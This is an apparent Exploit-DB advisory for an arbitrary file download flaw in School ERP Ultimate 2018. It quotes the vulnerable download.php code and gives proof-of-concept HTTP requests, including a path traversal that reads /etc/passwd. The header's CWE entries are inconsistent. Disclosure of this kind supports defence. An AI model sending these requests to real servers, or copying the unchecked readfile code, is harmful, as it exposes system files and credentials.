School ERP Ultimate 2018 - Arbitrary File Download

vendor:

School ERP Ultimate 2018

by:

Ihsan Sencan

7.5

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: School ERP Ultimate 2018

Affected Version From: 2018

Affected Version To: 2018

Patch Exists: NO

Related CWE: N/A

CPE: a:freeschoolerp:school_erp_ultimate_2018

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

School ERP Ultimate 2018 – Arbitrary File Download

School ERP Ultimate 2018 is vulnerable to arbitrary file download. An attacker can download any file from the server by manipulating the 'document' parameter in the download.php file. The download.php file is present in both student_staff and office_admin directories. An attacker can download any file from the server by manipulating the 'document' parameter in the download.php file. For example, an attacker can download the /etc/passwd file by sending a GET request to the download.php file with the 'document' parameter set to '../../../../../etc/passwd'.

Mitigation:

The application should validate the user input and restrict the access to the download.php file.

Source

Exploit-DB raw data:

# Exploit Title: School ERP Ultimate 2018 - Arbitrary File Download
# Dork: N/A
# Date: 2018-10-21
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://freeschoolerp.com/
# Software Link: http://freeschoolerp.com/schoolerp_30Nov2017_free.zip
# Software Link: https://sourceforge.net/projects/free-school-management-system/files/latest/download
# Version: 2018
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/student_staff/download.php?document=[FILE]
# http://localhost/[PATH]/office_admin/download.php?document=[FILE]
# 
# /[PATH]/student_staff/download.php
# /[PATH]/office_admin/download.php
# ....
# if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") {
# $file = $_REQUEST['document'];
# header("Content-type: application/force-download");
# header("Content-Transfer-Encoding: Binary");
# header("Content-length: ".filesize($file));
# header("Content-disposition: attachment; filename=\"".$file."\"");
# readfile($file);
# exit;
# }
# ....

GET /[PATH]/student_staff/download.php?document=download.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 00:30:01 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="download.php"
Content-Length: 337
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download

GET /[PATH]/office_admin/download.php?document=../../../../../etc/passwd HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 21 Oct 2018 00:31:34 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Content-Disposition: attachment; filename="../../../../../etc/passwd"
Content-Length: 46368
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download